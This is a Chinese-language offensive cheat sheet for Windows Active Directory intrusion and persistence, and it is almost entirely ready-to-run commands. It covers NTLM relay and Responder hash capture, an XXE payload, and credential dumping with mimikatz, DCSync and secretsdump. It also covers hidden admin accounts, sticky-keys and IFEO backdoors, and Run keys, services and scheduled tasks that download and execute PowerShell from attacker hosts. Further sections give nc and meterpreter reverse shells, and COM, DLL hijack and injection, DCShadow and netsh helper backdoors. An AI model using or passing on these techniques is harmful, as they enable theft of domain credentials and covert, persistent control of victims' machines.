>python ntlmrelayx.py -t ldaps://dc.zone.com --remove-mic --delegate-access -smb2support>python printerbug.py zone.com/y@win7.zone.com 192.168.0.attack>python getST.py -spn host/win7.zone.com 'zone.com/机器账户$:密码' -impersionate administrator -dc-ip 192.168.0.1>export KRB5CCNAME=XX.ccahe>python secretdump.py -k -no-pass dc.zone.com -just-dc

NTLM中继

Ntlmrelayx+资源受限委派

域控需启用ldaps,域机器启用ipv6*当执行ntlmrelayx脚本时,遇到报错

修改
impacket/impacket/examples/ntlmrelayx/attacks/ldapattack.py ldapattack.py脚本,在510行上方加入if self.config.interactive:

再重新安装>python setup.py install使用mitm6通过ipv6接管dns服务器,配置好后开始请求网络的WPAD>mitm6 -i eth1 -d zone.com

使用ntlmreplyx.py监听
>python ntlmrelayx.py -t ldaps://dc.zone.com -debug -ip 10.1.1.101 --delegate-access --add-computer当目标重启网络、访问浏览器、重启电脑时会把攻击机视为代理服务器,当目标通过攻击机代理服务器访问网络时,攻击机将会向目标发送代理的认证请求,并中继NTLM认证到LDAP服务器上,完成攻击。这里要使用ldaps,因为域控会拒绝在不安全的连接中创建账户。

可以看到
已经成功添加了一个机器账户RFAYOVCC密码6YdX.NXqQGyuR7[
使用此机器账户申请票据
>python getST.py -spn cifs/sub2k8.zone.com zone.com/RFAYOVCC\$ -impersonate y

>export KRB5CCNAME=y.ccache获取shell>python smbexec.py -no-pass -k sub2k8.zone.com

dumphash、缓存hash>python secretsdump.py -k -no-pass sub2k8.zone.com


当域控机器未启用LDAPS,并且已获得域普通用户权限时
使用powermad创建一个机器账户newcom
https://github.com/Kevin-Robertson/Powermad>New-MachineAccount -MachineAccount newcom -Password $(ConvertTo-SecureString '123qwe!@#' -AsPlainText -Force)




>python ntlmrelayx.py -t ldaps://dc.zone.com -debug -ip 10.1.1.101 --delegate-access --escalate-user newcom\$

后续正常操作即可。
内网存在java webdav时PROPPATCH、PROPFIND、 LOCK等请求方法接受XML作为输入时会形成xxe。攻击者要求采用NTLM认证方式是,webdav会自动使用当前用户的凭据认证。使用ntlmrelayx监听
>python ntlmrelayx.py -t ldaps://dc.zone.com -debug -ip 10.1.1.101 --delegate-access --escalate-user newcom\$Burp发送xxe请求PROPFIND /webdav HTTP/1.1Host: 1.1.1.1
<?xml version"1.0" encoding="UFT-8"?><!DOCTYPE xxe [<!ENTITY loot SYSTEM "http://10.1.1.101"> ]><D:xxe xmln:D="DAV:"><D:set><D:prop><a xmlns="http://xx.e">&loot;</a></D:prop></D:set></D:xxe>

Responder

SMB协议截获
内网中间人攻击脚本,kali内置监听网络接口>responder -I wlan0(eth0)指定某台机器或网段:修改/etc/responder/Responder.py中RespondTo参数。网段中有认证行为会捕获NTLMv2 hash


当访问一个不存在的共享时修改配置文件来解析
Xp
修改/usr/share/responder/servers/SMB.py定位到errorcode修改为\x71\x00\x00\xc0,删除掉/usr/share/responder/Responder.db

XP时使用\\cmd\share形式访问共享输入密码达4次会断开连接。

定位到


修改self.ntry != 10
Win7以上
修改/usr/share/responder/servers/SMB.py定位到##Session Setup 3


删除掉and GrabMessageID(data)[0:1] == "\x02",删除掉/usr/share/responder/Responder.db修改后可以进行解析,捕获hash,否则会报错误64




WPAD代理欺骗
>responder -I eth0 -v -F F参数即可开启强制WPAD认证服务抓取 hash,访问IE或重启电脑即可发送欺骗认证获得hash

重启也可以抓到


Web漏洞
内网中使用文件包含漏洞和XSS
>Responder -I eth0 -vhttp://10.1.1.1/file.php?file=\\10.1.1.12\sharehttp://10.1.1.1/xss.php?article=<img src=\\10.1.1.12\xx>
中继攻击
修改/etc/responder/Responder.conf文件,配置smb和http为Off,分别开启两个对话框,使用F参数启用WPAD欺骗浏览器,使用/usr/share/responder/tools中的MultiReplay.py进行中继攻击获得目标cmdshell。>Responder -I eth0 -v -F>python MultiReplay.py -t 192.168.0.115 -u ALL



NTLMv2Hash破解
使用hashcat破解 -m 5600为NTLMv2类型
>hashcat -m 5600 pass.txt wordlists.txt


GPP-Password

域内机器可访问\\zone.com\SYSVOL\zone.com共享文件夹,翻看策略文件,查找groups.xmlScheduledTasks\ScheduledTasks.xmlPrinters\Printers.xmlDrives\Drives.xmlDataSources\DataSources.xmlServices\Services.xml等文件

使用powersploit脚本解密

使用msf的auxiliary/scanner/smb/smb_enum_gpp模块


WinRM无文件执行

>winrm quickconfig –q启动winrm或PS>Enable-PSRemoting -Force生成木马并启动监听


放入已获得权限的机器C盘中
内网另外机器中执行
>net use \\192.168.0.115\c$>winrm invoke create wmicimv2/win32_process @{commandline="\\192.168.0.115\c\index.exe"}

添加域管命令

>net user admin$ pass@123 /add /doamin>net group "Domain admins" admin$ /add /domain

SSH密钥免密登录

>ssh -i id_rsa user@192.168.0.110

获取保存的RDP密码

位置C:\Users\用户名\AppData\Local\Microsoft\Credentials查看命令>cmdkey /list>mimikatz log#dpapi::cred /in:C:\Users\administrator\AppData\Local\Microsoft\Credentials\D53BF8DC4D52D75463D46595907A4015记录guidMasterKey: {572115f2-80b1-4b1e-be1b-425f5c7a8bfd}#privilege::debug#sekurlsa::dpapi找到GUID为guidMasterKey的值下面的MasterKey: d928f5e02d2e9495f92bb…#dpapi::cred /in:C:\Users\administrator\AppData\Local\Microsoft\Credentials\D53BF8DC4D52D75463D46595907A4015 /masterkey: d928f5e02d2e9495f92bb…密码为CredentialBlob值。

后门&持久化

影子用户

>net user test$ test /add>net localgroup administrators test$ /add注册表HKEY_LOCAL_MACHINE\SAM\SAM\给予administrator SAM的完全控制和读取的权限以下导出为1.regHKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\test$记录HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\test$的默认类型000003EA以下导出为2.regHKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EA默认administrator默认类型为000001F4以下导出为3.regHKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4把000001F4(3.reg)的F值粘贴到000003EA(2.reg)的F值修改后导入>regedit /s 1.reg>regedit /s 2.reg删除net user test$ /delPowershell脚本https://github.com/3gstudent/Windows-User-Clone/blob/master/Windows-User-Clone.ps1需system权限>Create-Clone -u 要创建的 -p 密码 -cu 想要克隆的


RID劫持

利用场景:激活guest修改rid为管理员的修改低权限用户rid劫持rid之前普通用户1的rid值

使用msf的post/windows/manage/rid_hijack模块

运行后可以看到已经变为超管的rid值
此时普通用户1登录系统是为超管权限

Guest激活

激活来宾账户,修改其密码,加入administrators组
>net user guest /active:yes>net user guest 123qwe!@#>net localgroup administrators guest /ad

映像劫持

Sethc

>move sethc.exe 1.exe>copy cmd.exe sethc.exe5下shift调用cmd

轻松使用

注册表
计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\新建Utilman.exe,新建字符串值Debugger,指定为C:\Windows\System32\cmd.exe> REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

IFEO静默执行

计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe 新建DWORD值GlobalFlag 16进制为200创建:计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe字符串值:MonitorProcess=muma.exeDWORD值ReportingMode=1>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v GlobalFlag /t REG_DWORD /d 512 /f>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v ReportingMode /t REG_DWORD /d 1  /f>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v MonitorProcess /t REG_SZ /d "c:\windows\system32\cmd.exe" /f

注册表启动项

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RunHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

MSF

添加一个监听Meterpreter> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'查询是否添加成功Meterpreter> reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v ncMeterpreter> reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run开启防火墙进站规则> netsh firewall add portopening TCP 444 "name" ENABLE ALL重启> shutdown -r -t 0

CMD

查看注册表启动项>REG query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"添加启动项>REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "windowsupdate" /t REG_SZ /F /D "c:\windows\temp\update.exe"删除启动项>REG delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "windowsupdate" /f

计划任务

加载powershell

>schtasks /Create /tn 名字 /tr 运行程序 /sc hourly /mo 1>schtasks /create /S TARGET /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://192.168.0.107:8080/Invoke-PowerShellTcp.ps1''')'"

执行exe

创建计划任务
>schtasks /create /RL HIGHEST /F /tn "windowsupdate" /tr "c:\windows\temp\update.exe" /sc DAILY /mo 1 /ST 12:25 /RU SYSTEM查看计划任务>schtasks /query | findstr "windowsupdate"立即执行某项计划任务>schtasks /run /tn "windowsupdate"删除某项计划任务>schtasks /delete /F /tn "windowsupdate"普通用户权限计划任务>schtasks /create /F /tn "windowsupdate" /tr "D:\user\zhangsan\file\windowsupdate.exe" /sc DAILY /mo 1 /ST 12:25 >schtasks /query | findstr "windowsupdate" >schtasks /run /tn "windowsupdate" >schtasks /delete /F /tn "windowsupdate" >schtasks /tn "SysDebug" /query /fo list /v

进程注入

AppCertDlls

注册表HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager\下新建AppCertDlls,新建名字为Default,值为c:\1.dll的项#msfvenom –p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 –f dll >/root/1.dllMsf>use exploit/multi/handlerMsf>set payload windows/meterpreter/reverse_tcphttps://cdn.securityxploded.com/download/RemoteDLLInjector.zip> RemoteDLLInjector64.exe PID c:\1.dll

AppInit_DLLs

注册表HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Window\Appinit_DllsAppInit_DLLs设置为c:\1.dllLoadAppInit_DLLs设置为1

MSF

Msf>use post/windows/manage/reflective_dll_injectMsf>set session 1Msf>set pid 1234Msf>set path c:\\1.dllMsf>run&migrate +pid&Meterpreter>run post/windows/manage/migrate

登录初始化

计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon下添加Userinit值>Powershell.exe Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit -value "C:\Windows\system32\userinit.exe,c:\muma.exe"计算机\HKEY_CURRENT_USER\Environment创建键值UserInitMprLogonScript值为c:\muma.exe&Powershell实现:>Set-ExecutionPolicy RemoteSigned 保存ps1执行Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit -value "C:\Windows\system32\userinit.exe,powershell.exe -nop -w hidden -c $w=new-object net.webclient;$w.proxy=[Net.WebRequest]::GetSystemWebProxy();$w.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $w.downloadstring('http://192.168.2.11:8080/kaMhC1');"# powershell反弹shell的payload参照msf中的web_delivery模块

屏幕保护程序

计算机\HKEY_CURRENT_USER\Control Panel\DesktopSCRNSAVE.EXE - 默认屏幕保护程序,改为恶意程序(设置备份)ScreenSaveActive - 1表示屏幕保护是启动状态,0表示表示屏幕保护是关闭状态ScreenSaverTimeout - 指定屏幕保护程序启动前系统的空闲事件,单位为秒,默认为900(15分钟)

MOF

>git clone https://github.com/khr0x40sh/metasploit-modules.git>mv metasploit-modules/persistence/mof_ps_persist.rb /usr/share/metasploit-framework/modules/post/windows/>reload_all>use post/windows/mof_ps_persist>set payload windows/x64/meterpreter/reverse_tcp>set lhost 192.168.0.108>set lport 12345>set session 1>run

>use exploit/multi/handler>set payload windows/x64/meterpreter/reverse_tcp>set lhost 192.168.0.108>set lport 12345>set exitonsession false

重启后还会上线

清除后门,进入meterpreter,resource 生成的rc文件

停止MOF>net stop winmgmt删除文件夹:C:\WINDOWS\system32\wbem\Repository\>net start winmgmt 

WinRM端口复用

WinRM端口5985,win2012以上默认启动,2008开启命令>winrm quickconfig -q2012启用端口复用>winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}2008启用WinRM后修改端口为80>winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}后门连接和使用本地开启WinRM并设置信任连接主机>winrm quickconfig -q>winrm set winrm/config/Client @{TrustedHosts="*"}执行命令>winrs -r:http://10.1.1.100 -u:administrator -p:password ipconfig /all获取cmdshell>winrs -r:http://10.1.1.100 -u:administrator -p:password cmd

只administrator允许远程登录WinRM,允许其他用户可以登录,执行注册表>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

创建服务

重启维持nc
>sc create ms binpath= "cmd /K start c:\nc\nc64.exe -d 192.168.0.51 4567 -e cmd.exe" start= delayed-auto error= ignore重启维持psh#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=11111 -f psh-reflection >/var/www/html/xxx.ps1>sc create ms binpath= "cmd /K start C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -nop -exec bypass -c \"IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/xxx.ps1')\"" start= delayed-auto error= ignore

重启维持Cobalt strike
配置监听器,生成web传递模块Powershell脚本
>sc create ms binpath= "cmd /K start C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.0.107:8080/a'))\"" start= delayed-auto error= ignore

Delay执行大概2分钟上线
>sc delete ms 卸载服务Powershell>powershell.exe new-service -Name nuoyani -BinaryPathName "C:\WINDOWS\Temp\360.exe" -StartupType Automatic>$c2='new-';$c3='service -Name nuoyani -DisplayName OrderServ -BinaryPathName "C:\accc.exe" -StartupType Automatic'; $Text=$c2+$c3;IEX(-join $Text)

Bitadmin

创建下载任务>bitsadmin /create empire下载的文件设置>bitsadmin /addfile empire %comspec% c:\windows\temp\1.exe设置传输时运行的命令,MSFvenom生成dll放入temp目录>bitsadmin /SetNotifyCmdLine empire cmd.exe "cmd.exe /c rundll32 c:\windows\temp\1.dll,0"(bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://x.com/shell.sct scrobj.dll")启动任务>bitsadmin /resume empire列出所有用户的下载任务>bitsadmin /list /allusers /verbose

重启后也会上线

完成任务
>bitsadmin /complete empire>bitsadmin /cancel <Job> //删除某个任务>bitsadmin /reset /allusers //删除所有任务&>bitsadmin /create mission>bitsadmin /addfile mission %comspec% %temp%\cmd.exe>bitsadmin.exe /SetNotifyCmdLine mission regsvr32.exe "/u /s /i:http://192.168.0.107/shell.sct scrobj.dll">bitsadmin /Resume mission

CLR Injection

劫持调用.net程序,开机启动
https://github.com/3gstudent/CLR-Injection/blob/master/CLR-Injection_x64.bat


WMIC可替换为powershell
New-ItemProperty "HKCU:\Environment\" COR_ENABLE_PROFILING -value "1" -propertyType string | Out-NullNew-ItemProperty "HKCU:\Environment\" COR_PROFILER -value "{11111111-1111-1111-1111-111111111111}" -propertyType string | Out-Null
wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dllcertutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg.dll deletecertutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dllcertutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/test/master/msg_x64.dll deleteSET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%\msg_x64.dll" /FREG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F SET KEY=HKEY_CURRENT_USER\Software\Classes\WoW6432Node\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32REG.EXE ADD %KEY% /VE /T REG_SZ /D "%CD%\msg.dll" /FREG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F添加全局变量计算机\HKEY_CURRENT_USER\EnvironmentCOR_ENABLE_PROFILING=1COR_PROFILER={11111111-1111-1111-1111-111111111111}注册CLSID计算机\HKEY_CURRENT_USER\Software\Classes\CLSID添加项{11111111-1111-1111-1111-111111111111}和它的子项InprocServer32新建一个键ThreadingModel,键值为:Apartment,默认键值为dll路径劫持explorer.exe>SET COR_ENABLE_PROFILING=1>SET COR_PROFILER={11111111-1111-1111-1111-111111111111}位置(新建)HKEY_CURRENT_USER\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32默认值为恶意DLL新建ThreadingModel值为Apartment


COM OBJECT hijacking

CAccPropServicesClass and MMDeviceEnumerato无需超管权限,无需重启https://github.com/3gstudent/COM-Object-hijacking将恶意DLLbase64编码写入ps脚本


执行后会在
%appdata%\Microsoft\Installer\{BCDE0395-E52F-467C-8E3D-C4579291692E}目录释放2个文件,分别是x86和x64的dll会在注册表中HKEY_CURRENT_USER\Software\Classes\CLSID\新建{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}和子项默认指向恶意DLL只要指向.net程序便可上线。如ie,mmc等


Explorer

注册表位置:HKCU\Software\Classes\CLSID\创建项{42aedc87-2188-41fd-b9a3-0c966feabec1}创建子项InprocServer32Default的键值为恶意dll的绝对路径:C:\test\1.dll创建键值: ThreadingModel REG_SZ Apartment

HKCU\Software\Classes\CLSID{42aedc87-2188-41fd-b9a3-0c966feabec1}HKCU\Software\Classes\CLSID{fbeb8a05-beee-4442-804e-409d6c4515e9}HKCU\Software\Classes\CLSID{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}HKCU\Software\Classes\Wow6432Node\CLSID{BCDE0395-E52F-467C-8E3D-C4579291692E}

Squibledoo

创建1.sct
<?XML version="1.0"?><scriptlet><registration description="Component" progid="Component.WindowsUpdate" version="1.00" classid="{20002222-0000-0000-0000-000000000002}"></registration> <public> <method name="exec"> </method></public><script language="JScript"> <![CDATA[ function exec(){ new ActiveXObject('WScript.Shell').Run('calc.exe'); } ]]></script></scriptlet>创建COM对象>regsvr32.exe /s /i:http://192.168.0.107/1.sct scrobj.dll触发>cscript 1.jsvar test = new ActiveXObject("Component.TESTCB");test.exec()
DLL劫持

劫持1

注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\ExcludeFromKnownDlls下添加 "lpk.dll"(若无,自己创建)ExcludeFromKnownDlls可使KnownDLLs失效需要重新启动电脑查找可劫持的DLL:1.启动程序2.使用Process Explorer查看该应用程序启动后加载的DLL。3.从已经加载的DLL列表中,查找在上述“KnownDLLs注册表项”中不存在的DLL。HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs4.编写第三步中获取到的DLL的劫持DLL。5.将编写好的劫持DLL放到该应用程序目录下,重新启动该应用程序,检测是否劫持成功。

Explorer.exe启动调用winrar文件夹的RarExt.dll
Msf监听

复制dll文件到the-backdoor-factory文件夹中,加载恶意dll进原dll>python backdoor.py -f RarExt.dll -s reverse_shell_tcp_inline -P 12138 -H 192.168.0.107 指定为kali监听的IP和端口

生成好的dll在backdoored文件夹,传入靶机中,替换原dll文件,最好把原dll保存备份。每次打开windows资源管理器的时候,即可上线。重启可维持


劫持2

使用
https://github.com/coca1ne/DLL_Hijackerhttps://github.com/git20150901/DLLHijack_Detecter查看要劫持的DLL的函数导出表,会直接生成cpp源码,重编译指向恶意代码DLLHijack_Detecter可查看程序加载的不在KnownDLLs中的DLL

MSDTC服务劫持

服务名称MSDTC,显示名称Distributed Transaction Coordinator对应进程msdtc.exe,位于%windir%system32C:\Windows\System32\wbem\服务启动搜索注册表位置计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.51 LPORT=4444 -f dll -o /var/www/html/oci.dllOci.dll放入c:\windows\system32\重启服务即可>taskkill /f /im msdtc.exe

Rattler

自动化查找可劫持的DLLhttps://github.com/sensepost/rattler使用>Rattler_x64.exe calc.exe 1会列出可被劫持的DLL

按程序读取DLL位置顺序,把恶意DLL放入程序同目录后,执行程序即可。


DLL代理劫持右键

右键对应的注册表路径是HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers使用autoruns查看加载的DLL

以rarext.dll为例
使用https://github.com/rek7/dll-hijacking创建代理DLL
注意修改parse.py中dumpbin.exe的位置

>python3 parse.py -d rarext.dll

修改原DLL为rarext_.dll,重新生成解决方案命名为rarext.dll
将两个DLL放入原目录,重启

DLL劫持计划任务

function Invoke-ScheduledTaskComHandlerUserTask{[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]Param ([Parameter(Mandatory = $True)][ValidateNotNullOrEmpty()][String]$Command,
[Switch]$Force)$ScheduledTaskCommandPath = "HKCU:\Software\Classes\CLSID\{58fb76b9-ac85-4e55-ac04-427593b1d060}\InprocServer32"if ($Force -or ((Get-ItemProperty -Path $ScheduledTaskCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){New-Item $ScheduledTaskCommandPath -Force |New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null}else{Write-Verbose "Key already exists, consider using -Force"exit}
if (Test-Path $ScheduledTaskCommandPath) {Write-Verbose "Created registry entries to hijack the UserTask"}else{Write-Warning "Failed to create registry key, exiting"exit} }Invoke-ScheduledTaskComHandlerUserTask -Command "C:\test\testmsg.dll" -Verbose重启权限可维持

DLL注入

Powershell

生成DLL>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=6666 -f dll -o /var/www/html/x.dll>use exploit/multi/handler>set payload windows/x64/meterpreter/reverse_tcp>Powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.105/powersploit/CodeExecution/Invoke-DllInjection.ps1'); Invoke-DllInjection -ProcessID pid -Dll .\1.dll"
InjectProc
生成DLL#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12138 -f dll -o /var/www/html/qq.dll#use exploit/multi/handler#set payload windows/x64/meterpreter/reverse_tcp使用如下命令注入进程>InjectProc.exe dll_inj qq.dll xx.exe(存在的进程)


通过控制面板加载项维持权限



添加到注册表中,只要运行control命令打开控制面板即可加载dll
编译为dll,这里是弹框测试
#include <Windows.h>#include "pch.h"
//Cplappletextern "C" __declspec(dllexport) LONG Cplapplet( HWND hwndCpl, UINT msg, LPARAM lParam1, LPARAM lParam2){ MessageBoxA(NULL, "inject control panel.", "Control Panel", 0); return 1;}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved){ switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: { Cplapplet(NULL, NULL, NULL, NULL); } case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE;}reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\CPLs" /v spotless /d "C:\xxx\dll.dll" /f


通过自定义.net垃圾回收机制进行DLL注入

低权限用户可指定.net应用程序使用自定义垃圾收集器(GC),一个自定义GC可以以COMPLUS_GCName此环境变量指定,只需将此环境变量指向到恶意DLL,自定义GC的DLL需要一个名为GC_VersionInfo的导出表。
下面是个弹框DLL
#include <Windows.h>
BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ){ switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE;}
struct VersionInfo{ UINT32 MajorVersion; UINT32 MinorVersion; UINT32 BuildVersion; const char* Name;
};
extern "C" __declspec(dllexport) void GC_VersionInfo(VersionInfo * info){ info->BuildVersion = 0; info->MinorVersion = 0; info->BuildVersion = 0; MessageBoxA(NULL, "giao", "giao", 0);}


后执行任意.net程序可加载此DLL

当然也可以加载shellcode
https://github.com/am0nsec/MCGC

Windows FAX DLL Injection

恶意DLL改名为fxsst.dll放置在c:\windows\目录即可实现对explorer.exe的劫持

DSRM+注册表ACL后门

>reg add HKLM\System\CurrentControlSet\Control\Lsa /v DSRMAdminLogonBehavior /t REG_DWORD /d 2允许DSRM账户远程访问https://github.com/HarmJ0y/DAMP效果:域内任何用户可读取域控hashsystem权限执行>psexec.exe -accepteula -s -i -d cmd.exe域控制器执行PS>Add-RemoteRegBackdoor -ComputerName 域控名 -Trustee 'S-1-1-0' –Verbose

域内机器执行
https://raw.githubusercontent.com/HarmJ0y/DAMP/master/RemoteHashRetrieval.ps1PS> Get-RemoteLocalAccountHash -ComputerName 域控 –Verbose

域控上执行
>reg add HKLM\System\CurrentControlSet\Control\Lsa /v DSRMAdminLogonBehavior /t REG_DWORD /d 2

PTH攻击,mimikatz需以管理员身份启动
>mimikatz "privilege::debug" "sekurlsa::pth /domain:dc /user:Administrator /ntlm:9f1770aebd442b6b624bdfe9cbc720dd" exit


DCShadow&SID History

http://192.168.0.107/ps/nishang/ActiveDirectory/Set-DCShadowPermissions.ps1DCShadow攻击是通过更改AD架构,使域内一台机器伪造成域控。此脚本可以通过修改AD对象提供DCShadow攻击的最小权限。运行此脚本需要DA(Domain Administrator)权限,可以使指定用户不需要DA权限使用mimikatz。域控:dc.zone.com域内机器:sub2k8.zone.com域内普通用户:y域控执行>Set-DCShadowPermissions -Fakedc sub2k8 -Object dc -username y –Verbose注册sub2k8为假DC,给予用户y从sub2k8修改dc的计算机对象的权限。


在sub2k8上,以本地system权限启动一个mimikatz会话,以zone\y权限启动一个mimikatz会话。


System权限窗口执行dcshadow攻击,修改dc的计算机属性
Zone\y权限窗口用于推送
添加域管理
通过修改安全标识符,将域内普通用户y提升为域管理用户
>lsadump::dcshadow /object:y /attribute:primaryGroupID /value:512



Zone\y推送
>lsadump::dcshadow /push

此时在域控上查询可见y用户已经加入域管理组。

添加SIDHistory后门
记录域管理SID

>Set-DCShadowPermissions -FakeDC sub2k8 -Object y -Username y -Verbose

>lsadump::dcshadow /object:y /attribute:sidhistory /value:S-1-5-21-2346829310-1781191092-2540298887-500推送>lsadump::dcshadow /push

测试

域控中通过mimikatz命令可查询到SIDHistory

删除SIDHistory的方法
PS>Get-ADUser -Filter {name -eq "y"} –Properties sidhistory|foreach {Set-ADuser $_ –remove @{sidhistory="S-1-5-21-2346829310-1781191092-2540298887-500"}}


删除功能规则
输入的规则后面加参数-remove即可。


DCSync后门

服务器管理器找到域->查看->启用高级功能->右键属性->安全->everyone完全控制>mimikatz.exe "lsadump::dcsync /domain:zone.com /user:administrator" exit

或使用powerview添加一条ACL(域控执行)
>Add-DomainObjectAcl -TargetIdentity "DC=ZONE,DC=COM" -PrincipalIdentity 域内用户 -Rights DCSync -Verbose 

使用此账户在域内任意主机可使用mimikatz的dcsync功能导出凭据

移除ACL
>Remove-DomainObjectAcl -TargetIdentity "DC=zone,DC=com" -PrincipalIdentity 用户 -Rights DCSync -Verbose
Netsh Helper DLLhttps://github.com/outflanknl/NetshHelperBeaconhttps://github.com/rtcrowley/Offensive-Netsh-Helper

MSFvenom生成DLL

生成DLL格式木马

传至靶机执行命令
>netsh add helper C:\Windows\Temp\help.dll


MSF+web_delivery

关闭netsh权限不会掉,调用的powershell#use exploit/multi/script/web_delivery>set target 2            #PSH>set payload windows/x64/meterpreter/reverse_tcp>set lhost 192.168.0.107>set lport 12345

Visual Studio新建空白DLL项目,源文件添加现有文件
https://github.com/rtcrowley/Offensive-Netsh-Helper/blob/master/netshlep.cpp 复制生成的代码进文件中,配置管理器新建x64位数后生成解决方案,配置类型选择位动态库复制DLL到靶机执行

>netsh add helper helper.dll


MSF&Shellcode

关闭netsh后权限会掉https://github.com/outflanknl/NetshHelperBeaconMSFvenom生成.c格式>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12345 -f c -o /var/www/html/1.cVisual Studio打开项目若系统是64位需设置配置管理器为64位项目,反之32(解决方案右键属性)

将MSF生成shellcode粘贴进相应位置后生成解决方案。


会在项目目录x64/Release下生成dll
复制DLL到靶机system32目录下,执行命令
>netsh add helper C:\Windows\System32\NetshHelperBeacon.dll

只要启动netsh就会触发


MSSQL后门

注册表自启动
